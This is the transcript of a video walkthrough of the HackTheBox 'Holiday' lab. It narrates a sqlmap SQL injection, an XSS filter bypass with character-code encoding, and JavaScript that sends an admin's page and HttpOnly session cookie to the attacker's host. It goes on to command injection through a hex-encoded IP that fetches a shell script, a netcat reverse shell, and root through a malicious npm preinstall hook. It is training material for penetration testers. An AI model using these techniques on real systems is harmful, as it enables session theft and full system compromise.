What's going on, YouTube? This is IPSec, and we're going to be doing the holiday machine from HackTheBox. This machine was tough. It starts off with a SQL injection, then once you do that, it goes into cross-site scripting, which you have to bypass two filters. And then once you do that, there is a weird command injection where you're limited on what characters you can put in. And then after that, it is a PrivEsc through Node, or NPM, the Node Package Management. So, I may go through this a bit fast. I'm at Sans Hackfest from last Monday to this Monday, and we're doing the beta testing on Roster Labs, so I am very strapped for time. This video didn't have any time to prepare for, so I guess we'll pretty much be doing this live. Let's jump in. We'll start the box off with the NMAP, so nmap-sc, save script, sv, enumerate version, OA, output all formats. We'll call that NMAP, and the IP address of holiday, which is 10.10.10.25. Looking at those results, we do see port 22 and 8000 is open. 8000 is listening on HTTP, so let's see what is there. Did not type 8000. It is just a page with a big octagon. Looking at the source, we do see JavaScript, a CSS directory, image with hex.png. Maybe worth looking at steganography here, but the first thing, let's just check the obvious. Check like robots.txt, doesn't exist, and this is a semi-unique 404 page. And that is because it's running just straight Node JavaScript framework and not going through Nginx or Apache. But not too important. We can check like /admin, that's a common page, and we get to login. So we could try a few requests right here, but should set some type of enumeration going in the background, because always have background enumeration while you do active things, because you don't have to really do anything with this. It just runs. And when you hit a brick wall, it's always nice to go back and look at if any of your tools found anything else. So we'll run GoBuster, or GoBuster as I like, and we'll give it the URL, which is 10.10.10.25, and a word list. This can be a word list I created because I don't want to wait for a long time. I would recommend using the one in like user, share, GoBuster, small. I'll show that right after we do this. But first, we have to specify port 8000. Our GoBuster returns no results. And looking at this word list, we know at least one pull something back. We have /login and /admin here. So let's go back into Firefox. We'll turn intercept on so it goes to burp. Refresh this page. And we have to turn intercept on. Refresh. Go to burp. Send this to repeater. And we get results. So if we play with this user agent, just to see if it's doing some type of filtering, and have nothing there, or just don't have Linux, we get a 404 page. So it's doing some type of routing based upon user agent, and this is common when like web pages route to mobile clients, things like that, to serve up a mobile page. But we know we need to have Linux in this user agent if we want to do a GoBuster against the website. So we can specify -a for user agent, and we'll just put Linux. And we can see GoBuster now works. And I keep saying GoBuster, it's GoBuster, but yeah. The word list I mentioned before, if you haven't watched other videos, user, share, word list, GoBuster, and probably one of these directory list ones are good. Those are my normal go-tos. But next step would be to send this to SQLMap. So we have the request in burp. We're going to copy to file. We're going to call this login.request. Save it. Cat the file, make sure we copied everything, because if you have anything highlighted, anything at all, and copy to a file, we'll name this garbage. It'll only copy what's highlighted, and that can cause headaches. So we'll do SQLMap, and then I want to do -help real quick. Grep iRisk. Risks max is 3, and levels max is 5. Okay. These level and risk, it's just how risky or deep these queries go. Since this is a test site and not production, we want to have SQLMap throw everything at it. So we'll use those flags. So SQLMap-R, specify a request file, login.request, --level 5 --risk 3. And we can do threads 20 to try to speed it up. 10. So we'll do 10 threads. Login.request, critical, page not found. So when I copied this request, I copied one with Windows. So login.request, change Windows to be Linux. And this box would suck if your pen test machine was Windows and you weren't using Linux. So we'll run through this, let this run, and it should find something. There we go. Found or Boolean-based blind injection. And now it's trying to enumerate what type of database. It's going to be SQLite. Let this finish running. Come on, SQLMap. And we won't go into exactly how this injection works, just because strapped for time, there's plenty of other SQL injection boxes, and I'll save that piece for another video. We're just going to use NMAP to enumerate everything. So I'm going to do --tables, and we're just going to dump all the tables on the database. We could do --dump or --dump all and just dump everything, but again, this is going to be faster. So we know there's a users table, so we can just do --T, users, and then --dump. And this is going to take a little while, so we'll Control-C out of that. Threads 10. And you can see how quick this is. And oh, it's trying to crack it. Make sure. But the key thing is we have a username, Rick A, and the password, which is this MD5 sum. So we can just grab that, turn intercept off temporarily, paste this, and we get a website that has said, we know what this hash is. So going here, shows Rick A is never going to give you up. So Holiday just rickrolled us, kind of. Log in with those credentials, go back to the web page 10.10.10.25:8000/login. The username was Rick A with a capital R and A. The password's never gonna give you up. And we go into the booking management portal. Looks like we just have a agent's credentials because we don't have any administrative functions, but I would start a GoBuster in the background just to see if there's any other hidden pages. We could try like /admin to see if we have access there. Directs us back to /agent. So not going to do it because of time. Instead, we'll just click on a random entry and we see the booking details. Emails here, name, nothing interesting. If we go over to notes though, we do see all notes must be approved by an administrator. This process may take up to 1 minute, so it's safe to assume there is some script going on in the background that goes to a page and approves something. And if they're going to a page, let's try some JavaScript. So JavaScript would be like cross-site scripting. So script javascript.alert 0. So if someone views this page, what's going to happen? It can take up to a minute for this to come up, but it's going to show up and it's going to be filtered. And I believe the reason is the creator of the CTF didn't want the page people view to be cross-site scriptable, because if we had like 50 people hitting this page, then they'd all get cross-site scripted and bad things could happen. So instead, there's probably a separate portal with the administrator clicking approve, and that's the one that has cross-site scripting on it. You may think it's silly, but if we go over and Google like GoDaddy XSS blind, we should get a posting from ThreatPost, the hacker blog, from Matthew Bryant, aka Mandatory. And what he did is he put JavaScript in the GoDaddy's username field and was just testing it to see if any GoDaddy page was injectable. It wasn't until he ended up calling GoDaddy for an unrelated issue, and the tool he used was XSS Hunter, and it generated a report soon as the help desk agent got on the phone. And what happened was the GoDaddy portal wasn't vulnerable to cross-site scripting. However, that same information was used in a different website where the help desk was, and that didn't filter the JavaScript and ended up doing the cross-site scripting. So if you thought that was like a silly CTF thing, just want to tell you, it does happen in the real world, so this is a pretty cool challenge from that standpoint. Refreshing the page, and we do see it is completely filtered. So at this point, I'd go to like OWASP, XSS, evasion, and there is a cheat sheet that has a bunch of different things you can try. For the sake of time, I'm just going to do the one I know works. So image source equals quote, is it x slash or slash x? X slash, yeah, like this. Then we can do script javascript dot alert 0 slash script and that. And the reason this works is because we're putting JavaScript in the image tag. The regular expression that's checking this is just assuming this entire thing is a URL and not doing the filter. Or I believe that's exactly what's going on. Copy this, add it, and it's still not going to work. We have to do one last thing, and that is to encode this in ordinal values or numeric values. So if we do online JavaScript editor, I don't want that. There is a page. Here we go. So if we do JavaScript code and do string from char code is equal to, we'll do 65, 66, 67. And then execute that, we see the results ABC. So if we can get this, which is much safer than doing like document.write and other things, we can probably bypass the filter. So let's see, go back to booking management. I want to put this back on my clipboard. And we do see this went through. There's something that is filtered, and I can't remember off the top of my head. But if we look at the page source, we can see the difference here is it's not putting the ampersand in the HTML, forget what it's called, maybe entity encoding? Because right here, this is where we saw it being ugly, and this is where the thing printed cleanly. If we just go here, the reason it does this is because it's saying, hey, that is and less than. And this ampersand is also HTML entity encoded, so our browser didn't encode that character to be this. But because this less than is encoded, the JavaScript doesn't work on that page. So the next thing that we have to do is get the portion between here encoded, because I'm pretty sure maybe it's document.write or other things that it filters on. I know there's another filter here that we had to bypass. I just don't know the dirty words off the top of my head. So we'll do string dot, well, first we'll do eval string dot from char code, and then we can close that out, and then we have to close one more. And what we'd want to do is like a, let's see, document.write script. Oh, this is probably why, because we do other scripts in this. That's probably it. Script source equals HTTP 10.10.14. I think I'm 8. Yes, 10.10.14, 8. Because if we look at this, we can't just send this cookie into our netcat because we have HTTP only is enabled. So it's going to stop the easy cookie grabber JavaScript you may have seen in other examples or websites. But script source, close out my IP. No, we have to do a file name, holiday.js. That's fine for now. Script source, that, close the bracket, and /script. Okay. Single quote, close that, parenthesis. That should be it. So that document.write is going all that way. See if this works. And we'll see what gets filtered. I believe this script will. But we can begin doing the from care code thing. We could just find a website to automatically convert all this, but it's simple enough to do it in Python, and that's just how I prefer doing it. Whenever there's a simple task, I try to do it myself because you're going to have to learn how to code one day, and doing the simple things, it just builds up that muscle memory, and learning how to code is great. And the also benefit is you do it from a site and you have to do a small tweak because it's not in the exact format you want, you're screwed. If you have the code, you can just do it yourself. So first thing I need to show you is there is a way to go from character to ordinal, and that is just ord a. And we can see it prints 65. And I just did IPython. It's like interactive Python. So we need to create a loop to take a string because we can't do ord AB. It errors out. So we need to go one character at a time. So we're going to create a function by doing def, and we're going to name it create encoded JS. I'm going to pass it a string, and we'll call that string ASCII. The first thing here I'm going to do is just create decimal string, and that's going to be the encoded values. And I do this just because I want to assign this to be a string value. And by doing this double quote here, that's just, I guess, a getaway to do that. I don't want this variable to ever take any other form. So do that, and we can do for char, that would be for character, in this string, ASCII. We're going to do, we'll just print it out real quick to show you. Print char, double char. We go back, and if we do create encoded JS and now pass it like ABC, see what it does. Integer is required. So it wants this value to be an integer. Oh crap. I wanted ord. That's why it errored out. I was confused for a second, but ordinal char. That's what I want. Heard to talk and type. And then, whoa. Can we get back to where we were? Nope. So print, create encoded JS, ABC. And there we go. So what we want to do is have this all to be on one line. So we do that by just decimal string plus equals, and that's going to append. and then we're going to return decimal string. So now our function will return that. Oh. So what it's saying here is we have an error message. It can't add this ordinal to this string because it's a mismatch of variables. So we can do string around that and tell it, nope, I don't care if that's just a number, behave like a string. And then print encoded ABC, for char and ASCII. I returned too early. If we backspace this 4 times, there we go. Now, ABC works. But as you saw earlier, we do need to have commas between those numbers. So we can just do plus, comma. And then we're going to have one small issue of there being a trailing comma. So we can just put a colon -1 at the end of that string in brackets to say, hey, strip off the last character. And now when we run that, we get exactly what we want. So going back to this, document.write, string from char, so we can Encoded JS. We want to paste all of this. So I'm going to do 3 quotes so it doesn't escape. I don't have to escape anything. Actually, I'll show what happens if I don't do that first. So 2 single quotes, and we look at this line, and it's kind of miscolored because we have this one quote, and it's going till this other double quote, and that's the end of the string to its knowledge. Then this piece is behaving like it's not within these quotes. So what we do, triple quote at the beginning, triple quote at the end, and then we don't have to worry about escaping anything. And we have our variable. Whoops. We can copy this, paste it here, and we can just set up a netcat listener, lvnp 80. And we're going to hope this works, because if it doesn't, I will be really sad. So it's going to take about a minute for this to come through, and we should see the hit on this netcat. And the reason we're doing this first is just to make sure, hey, we have code execution on their browser because they're hitting us. It's just like a blind way to do it, or maybe it's not blind, just a back channel way to do it. Go here, still have 3. The last one was at 4 a.m. Refresh. It came 4:06, and our browser did not show it, so we have a mistake somewhere. So document.write, single quote, script space src, http 10. That is our IP, correct? ifconfig 10.4.4.14.8, yes. Yes. Close that off, /script, close the document write. That looks good. Let's look at this. Image source, there's no space here. Nope. Then script eval string from char code. Okay. Wonder if I need a semicolon here. And I'm missing a parenthesis. That's what it was. So we have 2 open parentheses, and we only had 1. So I'll try this again and wait. So hopefully this time it works, because I don't want to do a lot of debugging. Let's see. Image source script eval char. double and that. That should work. And we do. We get a hit back. So the web browser has access to our server and did a request for holiday.js. So what we have to do, and we also see they're hitting it from localhost. They're not going to the IP. So that's how that's coded. The easy part now, or I say easy, just the non-mind breaking of doing all this encoding, because this is doing 3 different encodes where web browser is getting this, it's converting this into from numbers to characters. Then it's doing an eval to execute what it just undid, and then it's got that evasion. So that was a pain. But the next part isn't too bad if you kind of know what you're doing. So we're going to create that holiday.js. We don't have to do any more evasion because it's putting a link to a file on our computer and then just executing it. So don't talk about any more of that. We just have to do some type of request to get the data out of that cookie that's HTTP only. So we're going to create 2 JavaScript requests. Rec1, new XMLHttpRequest, and we got to do another one. So one request is going to go to the page and pull the page, and the second request is going to send the page to us. So that's why I have 2 here. So request1.open get, then the URL, zoom, oops, that's not what I wanted, that is the holiday, so we want this URL, copy, paste that. Okay. The main thing to do is make sure every line ends in that semicolon. Request1.send. Okay. For response is equal to request1 response text. So what we're doing here is having their web browser send a request to the page and then save the response in a variable. Then we can do params, and now we're going to start building our request, or the request from it back to us. So equals cookie plus encode URI component response. That looks fine. Request2.open. We want to send a post request back to us. Encode URI component. I think I spelled that correct. Response. Spelling is also an issue. Request2.set request header content type application XW URL. Just creating the HTTP header here. And then request2.send params. I think that should be fine. We can move this down here just so it makes a bit more logical sense. So, creating a new XML request, having the web browser do a GET request to itself, and then save that response into a variable, create a new request, put the response variable in the cookie parameter, and send it back to us. think that should work. So, wait, I'm missing something. I need a second URL, don't I? Post. I don't know why I said that twice. Maybe I was saying something as I was talking, but no, that definitely isn't twice. That is HTTP 10.10.14.8, and we'll say port 8000 slash IPsec. That should be fine. So post URL boolean. Now that should work. That looks better. Python m simple HTTP server port 80, and we can set netcat on 8000. So now when we send the same request, it's actually going to download that holiday.js here, which is going to make it hit itself and then send us the response. So we'll see if that works. There we go. Checked. Should be executing. I guess we had an error because it's not sending us anything. So let's check our code. Nothing ever works right the first time. Ver request 1, new XML HTTP request. Okay. Get a page, that's fine. That's fine. For response is equal to request1.response text. That's fine. That's fine. For params equals. Forgot it equals here. Cookie plus. Good. So now we'll try. As you see, everything is trial and error. So 414 is the last time this hit. 49. So hopefully this one works. I want to direct this to a file, but I don't want to miss. So if it responds, it's going to send the contents to a file. Check here to make sure. I do have it in that. So 414 is the last time. Still has not hit. So as soon as this hits, we'll see if we did it correctly. 416. And we get a connection. So finally, we have that cookie. If we cat the file, no we don't. It didn't put it in. Did an options request. That should be a post request. Fee holiday. Request 2. Open. Post. Comma. HTTP 10.10.14.8. 8000 IPsec true. Okay. Did I misspell this? Encode URICOMPONENT. No, I did not. I'm not sure what happened here. Request 2, set, request header, content type, application, request 2, params. I have no idea why it did that options request. I mean, it obviously read this line if it knew how to get back to me. try it again. Definitely want to save that in case I overwrite in my clipboard. What? Sent. Connection. So let's try this again. Still nothing. Oh, I see what it is. Oops. Scroll down. URL encoded. Stupid mistake. Things are really sensitive. So now when I send that to a file, this will work. It's going on port 80. It's going to hit this. Notes. Do I still have it? Do not have my clipboard. That is why I was smart and put it here. So, copy, paste. Sorry about that, guys. That was frustrating, but hopefully it's a learning experience that even the smallest of typos can cause major issues. Forgot a simple D. Come on. There we go. We got the request. If we cat temp, we have a bunch of data now. So what we're going to do is open a new tab, cat temp, and this is all URL encoded. So what we have to do is unencode this, and then we can view the contents. And it's a lot easier than you'd think. So copy, just minimize that. Go back in Python, we can import URL lib, and then print URL lib dot unquote, do the triple quotes, paste all that data, triple quotes, and I didn't undo the parenthesis. So go to the end line, and we get the URL, or the content of that HTML page. The important thing is down at the very bottom, we see a hidden function, admin approve, and we have a cookie, connect SID, and then some data. So if we copy this cookie, I haven't copied yet because I want to see what mine looks like. Tools, cookie manager, edit, connect SID, S%. Copy this, replace, refresh, and now I have the admin page. And here's the notes page. If I do something, we'll see if it's immediately cross-site scripted. So, cat XSS, paste, go back to this, and we'll see if it immediately gets approved or gets hit. Notes. So we hit it. I don't know where we hit it, but we hit it. So there was cross-site scripting somewhere. Oh, we get redirected immediately. So if I paste this, intercept request, proxy, don't want that one, go back here, paste. We see our post, get this page, I'm sure it's just redirecting us immediately because I think it should go to a approved page where we can see that cross-site scripting. But needless to say, we are now an admin. Oh, here's that approved page. But we're now admin, so what we can do is if we go to /admin, we have two features right here. An export feature. So if we export notes, we can save this to file and cat download /notes. Was it note? What did it save as? Export notes. We see we have some type of way to export data. If we try to do any fuzzing on this, so if we go back to burp, turn intercept on, click on notes, repeater. Okay, we got the page. Let's try ;ls to try old-fashioned command injection. We get invalid table name. The only characters are a range of A to Z, 0 to 9, and space and slash. So we have ands. So if we do and ls, what happens? We get no output from and ls, but if we did like we have to encode this as well. Because and is a URL thing to separate variables. But still, don't see anything. If we do sleep plus 10, try like a blind injection method, now the page is going to take just about 10 seconds. So we know we have code execution. One other thing you can do, and I'll do it once this page comes back, there we go, 10.028 milliseconds, is if we did a slash here and escape the SQLite syntax, we could get syntax back. But that isn't needed for what we're going to be doing. We have to get command injection with only those few characters or a reverse shell. And it may be difficult because if we go to the reverse shell cheat sheet, almost everything is going to use semicolons or periods. So we can do space /etc to get something, but if we tried to cat etc add user.conf, even if we don't have permission for this, it won't matter because dot is not allowed. That is a very common character in almost every command. And like I said, IPs, host names, etc. all have that dot in them. However, there are different ways to encode an IP. So if you do like, let's see, is intercept on? Encode IP hex. If we convert our IP into hex, 0xF001, the computer actually resolves it. You can encode the IP in other formats. The 127.0.0.1 is just the most common format to encode the IP. So what that means is we can actually do like a wget request to download a file. So we want to encode 10.10.14.8. Bing. Did I copy that wrong? I had an H to the end. There we go. 10.10.14.8. It's my IP. So what we can do, go back to burp, repeater, notes, wget, 10, 10, 14, 8 in hex format, plus we'll do port 80. Oh, we don't have to. We can just do slash shell.php. Can't do a slash. Slash shell. We can't do a dot. So we can only name it slash shell. But that's fine. So if we do v shell, and we'll try pen test monkey for shell cheat sheet. This one may work, and it's super simple, but this is by far the most reliable one. Ben sh netcat 10 10 14 8, and we'll do this on port 1337. Okay. Ben bash should be fine. Python m simple HTTP server on port 80 is already in use. Server here, that's fine. Go back to perp, wget shell. And valid character, where is that? Notes, that's an ampersand, wget plus a to z 0x, not case sensitive, so lowercase a, lowercase e. Wget Python looks like it handled that just fine, so if we go to burp again, oh, we have to open up a shell. Netcat lvnp 80, clear this first, ncat lvnp 1337. I don't know why it generated an RSA key. I don't have -SSL. That was weird. I'm just going to do ncat. There we go. So we have that wget down. Name this download. That was a login. This will be execute. Do table /wget bash space shell. And we get a shell. So the next thing to do, Python C, import pty, pty.spawn /bin bash, python.found, python3-c, import pty, pty.spawn /bin bash. There we go. Background with Control Z, stty raw -echo, foreground, and we have a shell. So the first thing to do is, I guess, sudo -l, and we see that we may access npm. Oh, I'm going to sidetrack a little bit. The whole reason that I knew about this encoding IP thing was actually a funny story. If you Google, what is it, ICTF, the 2016 DDoS, there we go. If you Google that, this is a good article that explains it. So essentially, long story short, there was a CTF competition, and probably the team that could have won it had created a botnet and infected everyone at that CTF. And what they were doing is stealing flags and all that sort of thing. The cheatery. But what they also did was, at the very last second, tried to denial of service the winning team so they couldn't submit flags, and then this team could submit flags and take first place. But in doing so, they denial of service the entire CTF competition, brought it down so they couldn't submit their flags to take first place, and ended up losing. To top it off, once they lost, they had the balls to complain to the CTF organizers saying, hey, your scoring system went down. We couldn't submit flags. That's bullcrap. We should have first place. Which caused an investigation. The investigation found this botnet that they used, and one of the things they did was encode IP addresses. I think it was, let's see if we can find it. But yeah, I would highly recommend reading this article. Decoding. Yeah, they're using it in ordinal format. Like this IP address, 288.774, like, that's not an IP address, but if we try to ping it, just straight numbers, goes to 172.31.129.203. So, highly recommend that blog post. But we can go back to the PrivEsc. So we see npm has the sudo permission to do whatever I space stir is, and that is install. So if we do npm I and then something, we see it is trying to install. And this is a very dangerous thing to do. It was prevalent on Macs quite a while ago when Homebrew had configured it in this way that gave npm the sudo permission to install. And if we Google around, we should be able to find an article. So npm install dangerous. Very first blog post that comes up with that is this one. And he kind of says exactly what the issue is, but we'll just be doing it pretty quickly. So if we copy these files, and I know it's probably better to git clone and copy them, but these boxes don't have internet, so yeah. rimrefall. See that? V, this was index.js. I don't think this file is needed, but might as well. It doesn't take long to copy it. And the next file, package.json. Copy this. Okay. Name, description, pre-install. This is the thing where all the issues have come from. This pre-install flag allows us to execute shell commands. So if we execute, let's see, if we do that, we can save that. V /temp, we'll copy shell to /temp shell. cd/temp v shell, and we'll change temp F to temp B. Change this port to 1338, and we'll see if we can execute this script. That looks fine. Edit this. Pre-install is now going to be bash temp shell. Okay. Open a new window, nclvnp 1338. Now we can cat verify. Yes, it's going to run the shell. npm I to install it, rimrefall. Don't forget the sudo. And see if that works. Doesn't look like an executed. We'll try --unsafe. See if that does anything. And we get a shell back. ID, and we are root. So cd root, and we could view the flag. So that is how you do node, or not node, holiday. Holiday is the machine we're doing. So you can tell it's been a long week. So yep, hope you guys enjoyed, and I guess I'll see you next week for whatever boxes retire next. Take care, guys.